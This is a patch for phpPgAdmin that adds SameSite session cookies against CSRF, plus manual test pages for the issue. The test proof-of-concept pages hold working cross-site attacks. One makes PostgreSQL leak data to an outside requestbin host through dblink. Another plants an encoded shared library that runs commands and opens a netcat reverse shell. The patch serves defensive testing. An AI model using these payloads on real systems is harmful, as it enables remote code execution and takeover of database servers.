phpPgAdmin/csrf-samesite-fix.patch

312 lines
22 KiB
Diff
Raw Normal View History

Index: classes/Misc.php
===================================================================
--- classes/Misc.php.orig
+++ classes/Misc.php
@@ -1333,6 +1333,10 @@
$server_info = $this->getServerInfo();
$reqvars = $this->getRequestVars('table');
+ if (!$conf['extra_session_security']) {
+ echo '<div class="alert-banner"><p><a href="http://phppgadmin.sourceforge.net/doku.php?id=faq#other_questions" target="_blank" rel="noopener noreferrer">', htmlspecialchars($lang['sessionsecuritywarning']), '</a></p></div>';
+ }
+
echo "<div class=\"topbar\"><table style=\"width: 100%\"><tr><td>";
if ($server_info && isset($server_info['platform']) && isset($server_info['username'])) {
Index: conf/config.inc.php-dist
===================================================================
--- conf/config.inc.php-dist.orig
+++ conf/config.inc.php-dist
@@ -89,6 +89,15 @@
// your browser preference.
$conf['default_lang'] = 'auto';
+ // If extra session security is true, then PHP's session cookies will have
+ // SameSite cookie flags set to prevent CSRF attacks. If you're using
+ // auto-start sessions, autostarted sessions will be destroyed and
+ // restarted with SameSite on. If this this solution is not acceptable for
+ // your situation, you will need to either turn off auot-start sessions, or
+ // turn off secure sessions. Versions of PHP below 7.3 do not have access
+ // to this feature and will be vulnerable to CSRF attacks.
+ $conf['extra_session_security'] = true;
+
// AutoComplete uses AJAX interaction to list foreign key values
// on insert fields. It currently only works on single column
// foreign keys. You can choose one of the following values:
Index: lang/english.php
===================================================================
--- lang/english.php.orig
+++ lang/english.php
@@ -807,6 +807,7 @@
$lang['strloading'] = 'Loading...';
$lang['strerrorloading'] = 'Error Loading';
$lang['strclicktoreload'] = 'Click to reload';
+ $lang['sessionsecuritywarning'] = 'You are running phpPgAdmin without session security.';
// Autovacuum
$lang['strautovacuum'] = 'Autovacuum';
Index: libraries/lib.inc.php
===================================================================
--- libraries/lib.inc.php.orig
+++ libraries/lib.inc.php
@@ -50,11 +50,36 @@
require_once('./classes/Misc.php');
$misc = new Misc();
- // Start session (if not auto-started)
- if (!ini_get('session.auto_start')) {
- session_name('PPA_ID');
- session_start();
- }
+ // Session start: if extra_session_security is on, make sure cookie_samesite
+ // is on (exit if we fail); otherwise, just start the session
+ $our_session_name = 'PPA_ID';
+ if ($conf['extra_session_security']) {
+ if (version_compare(phpversion(), '7.3', '<')) {
+ exit('PHPPgAdmin cannot be fully secured while running under PHP versions before 7.3. Please upgrade PHP if possible. If you cannot upgrade, and you\'re willing to assume the risk of CSRF attacks, you can change the value of "extra_session_security" to false in your config.inc.php file.');
+ }
+ if (ini_get('session.auto_start')) {
+ // If session.auto_start is on, and the session doesn't have
+ // session.cookie_samesite set, destroy and re-create the session
+ if (session_name() !== $our_session_name) {
+ $setting = strtolower(ini_get('session.cookie_samesite'));
+ if ($setting !== 'lax' && $setting !== 'strict') {
+ session_destroy();
+ session_name($our_session_name);
+ ini_set('session.cookie_samesite', 'Strict');
+ session_start();
+ }
+ }
+ } else {
+ session_name($our_session_name);
+ ini_set('session.cookie_samesite', 'Strict');
+ session_start();
+ }
+ } else {
+ if (!ini_get('session.auto_start')) {
+ session_name($our_session_name);
+ session_start();
+ }
+ }
// Do basic PHP configuration checks
if (ini_get('magic_quotes_gpc')) {
Index: tests/manual/issue-94/README.md
===================================================================
--- /dev/null
+++ tests/manual/issue-94/README.md
@@ -0,0 +1,42 @@
+# Testing CSRF vulnerabilities (Issue #94)
+
+How to test:
+
+1. Start phppgadmin:
+
+```
+$ cd /path/to/phppgadmin
+$ php -S localhost:8000
+```
+
+2. Set up a testing domain in /etc/hosts:
+
+```
+127.0.0.1 localhost2
+```
+
+3. Start the tests
+
+```
+$ cd /path/to/phppgadmin/tests/manual/issue-94
+$ php -S localhost2:8001
+```
+
+4. Open both sites in the same browser (different windows or tabs):
+
+```
+http://localhost:8000
+```
+
+```
+http://localhost2:8001
+```
+
+5. Log in to phppgadmin
+
+6. Run a test
+
+Choose a test from the list. Open your console, and click "Submit Request" -- you should see a CORS error, but the request should also appear in the network tab. Open it to see the response.
+
+If you see a login page, phppgadmin is protected. If not, phppgadmin is vulnerable.
+
Index: tests/manual/issue-94/index.html
===================================================================
--- /dev/null
+++ tests/manual/issue-94/index.html
@@ -0,0 +1,12 @@
+<html>
+<head>
+<title>Issue #94 (CSRF vulnerabilities) proof of concepts</title>
+</head>
+<body>
+<h1>Issue #94: CSRF vulnerabilities</h1>
+<ul>
+<li><a href="poc1.html">Proof of concept #1: out of band technique</a></li>
+<li><a href="poc2.html">Proof of concept #2: remote code execution</a></li>
+<ul>
+</body>
+</html>
Index: tests/manual/issue-94/poc1.html
===================================================================
--- /dev/null
+++ tests/manual/issue-94/poc1.html
@@ -0,0 +1,48 @@
+<html>
+<body>
+<script>
+function submitRequest() {
+ var xhr = new XMLHttpRequest();
+ xhr.open("POST", "http:\/\/localhost:8000\/sql.php", true);
+ xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+ xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
+ xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------317222262731323");
+ xhr.withCredentials = true;
+ var body = "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"query\"\r\n" +
+ "\r\n" +
+ "CREATE EXTENSION dblink;\r\n" +
+ "SELECT dblink_connect(\'host=mydatahere.b940ab686a17804777c0.d.requestbin.net user=postgres password=password dbname=dvdrental\');\r\n" +
+ "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
+ "\r\n" +
+ "2097152\r\n" +
+ "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"script\"; filename=\"\"\r\n" +
+ "Content-Type: application/octet-stream\r\n" +
+ "\r\n" +
+ "\r\n" + "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"execute\"\r\n" +
+ "\r\n" +
+ "Execute\r\n" +
+ "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"server\"\r\n" +
+ "\r\n" +
+ "localhost:5432:allow\r\n" +
+ "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"database\"\r\n" +
+ "\r\n" +
+ "postgres\r\n" +
+ "-----------------------------317222262731323--\r\n";
+ var aBody = new Uint8Array(body.length);
+ for (var i = 0; i < aBody.length; i++) {
+ aBody[i] = body.charCodeAt(i);
+ }
+ xhr.send(new Blob([aBody]));
+}
+</script>
+<form action="#">
+ <input type="button" value="Submit request" onclick="submitRequest();" />
+</form>
+</body>
+</html>
Index: tests/manual/issue-94/poc2.html
===================================================================
--- /dev/null
+++ tests/manual/issue-94/poc2.html
@@ -0,0 +1,53 @@
+<html>
+<body>
+<script>history.pushState('', '', '/')</script> <script>
+ function submitRequest() {
+ var xhr = new XMLHttpRequest();
+ xhr.open("POST", "http:\/\/localhost:8000\/sql.php", true);
+ xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+ xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
+ xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------297112967428312");
+ xhr.withCredentials = true;
+ var body = "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"query\"\r\n" +
+ "\r\n" +
+ "SELECT lo_create(43213);\r\n" +
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 0, decode(\'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\', \'base64\'));\r\n" +
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 1, decode(\'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAGAAAAAAAAI AYAAAAAAAABAAAAAAAAAIcAAAAAAAAADAAAAAAAAABABQAAAAAAAA0AAAAAAAAAsAYAAAAAAAAZAAAAAAAAABAOIAAAAAAA GwAAAAAAAAAIAAAAAAAAABoAAAAAAAAAGA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAA AiAMAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAAC1AAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAA AAAgAAAAAAAAAYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAACgFAAAAAAAABwAAAAAAAACABAAAAAAAAAgAAAAAA AAAqAAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAABgBAAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAAD4EAAAA AAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\', \'base64\'));\r\n" +
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 2, decode(\'IA4gAAAAAAAAAAAAAAAAAAAAAAAAAAAAdgUAAAAAAAAgECAAAAAAAEdDQzogKFVidW50dSA3LjMuMC0xNnVidW 50dTMpIDcuMy4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwABAMgBAAAAAAAAAAAAAAAAAAAAAAAAAwACA PABAAAAAAAAAAAAAAAAAAAAAAAAAwADADgCAAAAAAAAAAAAAAAAAAAAAAAAAwAEAIgDAAAAAAAAAAAAAAAAAAAAAAAAAwAF AD4EAAAAAAAAAAAAAAAAAAAAAAAAAwAGAGAEAAAAAAAAAAAAAAAAAAAAAAAAAwAHAIAEAAAAAAAAAAAAAAAAAAAAAAAAAwA IACgFAAAAAAAAAAAAAAAAAAAAAAAAAwAJAEAFAAAAAAAAAAAAAAAAAAAAAAAAAwAKAGAFAAAAAAAAAAAAAAAAAAAAAAAAAw ALAIAFAAAAAAAAAAAAAAAAAAAAAAAAAwAMAJAFAAAAAAAAAAAAAAAAAAAAAAAAAwANALAGAAAAAAAAAAAAAAAAAAAAAAAAA wAOAMAGAAAAAAAAAAAAAAAAAAAAAAAAAwAPAOAGAAAAAAAAAAAAAAAAAAAAAAAAAwAQABgHAAAAAAAAAAAAAAAAAAAAAAAA AwARABAOIAAAAAAAAAAAAAAAAAAAAAAAAwASABgOIAAAAAAAAAAAAAAAAAAAAAAAAwATACAOIAAAAAAAAAAAAAAAAAAAAAA AAwAUAOAPIAAAAAAAAAAAAAAAAAAAAAAAAwAVAAAQIAAAAAAAAAAAAAAAAAAAAAAAAwAWACAQIAAAAAAAAAAAAAAAAAAAAA AAAwAXACgQIAAAAAAAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAAAMA AAAAgAMAJAFAAAAAAAAAAAAAAAAAAAOAAAAAgAMANAFAAAAAAAAAAAAAAAAAAAhAAAAAgAMACAGAAAAAAAAAAAAAAAAAAA3 AAAAAQAXACgQIAAAAAAAAQAAAAAAAABGAAAAAQASABgOIAAAAAAAAAAAAAAAAABtAAAAAgAMAGAGAAAAAAAAAAAAAAAAAAB 5AAAAAQARABAOIAAAAAAAAAAAAAAAAACYAAAABADx/wAAAAAAAAAAAAAAAAAAAACiAAAAAQAOAMAGAAAAAAAAHAAAAAAAAA C1AAAAAQAOANwGAAAAAAAABAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAADDAAAAAQAQANAHAAAAAAAAAAAAAAAAA AAAAAAABADx/wAAAAAAAAAAAAAAAAAAAADRAAAAAQAWACAQIAAAAAAAAAAAAAAAAADeAAAAAQATACAOIAAAAAAAAAAAAAAA AADnAAAAAAAPAOAGAAAAAAAAAAAAAAAAAAD6AAAAAQAWACgQIAAAAAAAAAAAAAAAAAAGAQAAAQAVAAAQIAAAAAAAAAAAAAA AAAAcAQAAEgAMAGoGAAAAAAAADQAAAAAAAAAqAQAAIAAAAAAAAAAAAAAAAAAAAAAAAABGAQAAEAAWACgQIAAAAAAAAAAAAA AAAABNAQAAEgANALAGAAAAAAAAAAAAAAAAAABTAQAAEgAAAAAAAAAAAAAAAAAAAAAAAABnAQAAIAAAAAAAAAAAAAAAAAAAA AAAAACQAQAAEgAMAIQGAAAAAAAAKgAAAAAAAAB2AQAAEAAXADAQIAAAAAAAAAAAAAAAAAB7AQAAEAAXACgQIAAAAAAAAAAA AAAAAACHAQAAEgAMAHcGAAAAAAAADQAAAAAAAACYAQAAIAAAAAAAAAAAAAAAAAAAAAAAAACyAQAAIgAAAAAAAAAAAAAAAAA AAAAAAADOAQAAEgAJAEAFAAAAAAAAAAAAAAAAAAAAY3J0c3R1ZmYuYwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2 JhbF9kdG9yc19hdXgAY29tcGxldGVkLjc2OTYAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhb WVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AHBnX2V4ZWMuYwBQZ19tYWdpY19kYXRhLjQ3NzkAbXlf ZmluZm8uNDc4OABfX0ZSQU1FX0VORF9fAF9fZHNvX2hhbmRsZQBfRFlOQU1JQwBfX0dOVV9FSF9GUkFNRV9IRFIAX19UTUN fRU5EX18AX0dMT0JBTF9PRkZTRVRfVEFCTEVfAFBnX21hZ2ljX2Z1bmMAX0lUTV9kZXJlZ2lzdGVyVE1DbG9uZVRhYmxlAF 9lZGF0YQBfZmluaQBzeXN0ZW1AQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAF9lbmQAX19ic3Nfc3RhcnQAcGdfZmluZ m9fcGdfZXhlYwBfSVRNX3JlZ2lzdGVyVE1DbG9uZVRhYmxlAF9fY3hhX2ZpbmFsaXplQEBHTElCQ18yLjIuNQBfaW5pdAAA LnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgA uZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEuZHluAC5yZWxhLnBsdAAuaW5pdAAucGx0Lmc=\', \'base64\'));\r\n" +
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 3, decode(\'b3QALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV 9hcnJheQAuZHluYW1pYwAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAABwAAAAIAAAAAAAAAyAEAAAAAAADIAQAAAAAA ACQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAALgAAAPb//28CAAAAAAAAAPABAAAAAAAA8AEAAAAAAABEAAAAAAA AAAMAAAAAAAAACAAAAAAAAAAAAAAAAAAAADgAAAALAAAAAgAAAAAAAAA4AgAAAAAAADgCAAAAAAAAUAEAAAAAAAAEAAAAAQ AAAAgAAAAAAAAAGAAAAAAAAABAAAAAAwAAAAIAAAAAAAAAiAMAAAAAAACIAwAAAAAAALUAAAAAAAAAAAAAAAAAAAABAAAAA AAAAAAAAAAAAAAASAAAAP///28CAAAAAAAAAD4EAAAAAAAAPgQAAAAAAAAcAAAAAAAAAAMAAAAAAAAAAgAAAAAAAAACAAAA AAAAAFUAAAD+//9vAgAAAAAAAABgBAAAAAAAAGAEAAAAAAAAIAAAAAAAAAAEAAAAAQAAAAgAAAAAAAAAAAAAAAAAAABkAAA ABAAAAAIAAAAAAAAAgAQAAAAAAACABAAAAAAAAKgAAAAAAAAAAwAAAAAAAAAIAAAAAAAAABgAAAAAAAAAbgAAAAQAAABCAA AAAAAAACgFAAAAAAAAKAUAAAAAAAAYAAAAAAAAAAMAAAAVAAAACAAAAAAAAAAYAAAAAAAAAHgAAAABAAAABgAAAAAAAABAB QAAAAAAAEAFAAAAAAAAFwAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABzAAAAAQAAAAYAAAAAAAAAYAUAAAAAAABg BQAAAAAAACAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAfgAAAAEAAAAGAAAAAAAAAIAFAAAAAAAAgAUAAAAAAAA IAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAIcAAAABAAAABgAAAAAAAACQBQAAAAAAAJAFAAAAAAAAHgEAAAAAAA AAAAAAAAAAABAAAAAAAAAAAAAAAAAAAACNAAAAAQAAAAYAAAAAAAAAsAYAAAAAAACwBgAAAAAAAAkAAAAAAAAAAAAAAAAAA AAEAAAAAAAAAAAAAAAAAAAAkwAAAAEAAAACAAAAAAAAAMAGAAAAAAAAwAYAAAAAAAAgAAAAAAAAAAAAAAAAAAAAEAAAAAAA AAAAAAAAAAAAAJsAAAABAAAAAgAAAAAAAADgBgAAAAAAAOAGAAAAAAAANAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAA AAACpAAAAAQAAAAIAAAAAAAAAGAcAAAAAAAAYBwAAAAAAALwAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAswAAAA 4AAAADAAAAAAAAABAOIAAAAAAAEA4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAL8AAAAPAAAAAwAAA AAAAAAYDiAAAAAAABgOAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADLAAAABgAAAAMAAAAAAAAAIA4g AAAAAAAgDgAAAAAAAMABAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAAggAAAAEAAAADAAAAAAAAAOAPIAAAAAAA4A8 AAAAAAAAgAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAANQAAAABAAAAAwAAAAAAAAAAECAAAAAAAAAQAAAAAAAAIA AAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADdAAAAAQAAAAMAAAAAAAAAIBAgAAAAAAAgEAAAAAAAAAgAAAAAAAAAA AAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA4wAAAAgAAAADAAAAAAAAACgQIAAAAAAAKBAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA AQAAAAAAAAAAAAAAAAAAAOgAAAABAAAAMAAAAAAAAAAAAAAAAAAAACgQAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA AAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAABQEAAAAAAAAFgFAAAAAAAAGgAAACwAAAAIAAAAAAAAABgAAAAAAA AACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAqBUAAAAAAADUAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABEAAAADA AAAAAAAAAAAAAAAAAAAAAAAAHwXAAAAAAAA8QAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA=\', \'base64\'));\r\n" +
+ "SELECT lo_export(43213, \'/tmp/pg_exec.so\');\r\n" +
+ "CREATE FUNCTION sys(cstring) RETURNS int AS \'/tmp/pg_exec.so\', \'pg_exec\' LANGUAGE \'c\' STRICT;\r\n" +
+ "SELECT sys(\'mknod /tmp/backpipe p\');\r\n" +
+ "SELECT sys(\'/bin/sh 0\x3c/tmp/backpipe | nc 192.168.1.81 80 1\x3e/tmp/backpipe\');\r\n" +
+ "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
+ "\r\n" +
+ "2097152\r\n" +
+ "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"script\"; filename=\"\"\r\n" +
+ "Content-Type: application/octet-stream\r\n" +
+ "\r\n" +
+ "\r\n" +
+ "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"execute\"\r\n" +
+ "\r\n" +
+ "Execute\r\n" +
+ "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"server\"\r\n" +
+ "\r\n" +
+ "localhost:5432:allow\r\n" +
+ "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"database\"\r\n" +
+ "\r\n" +
+ "postgres\r\n" +
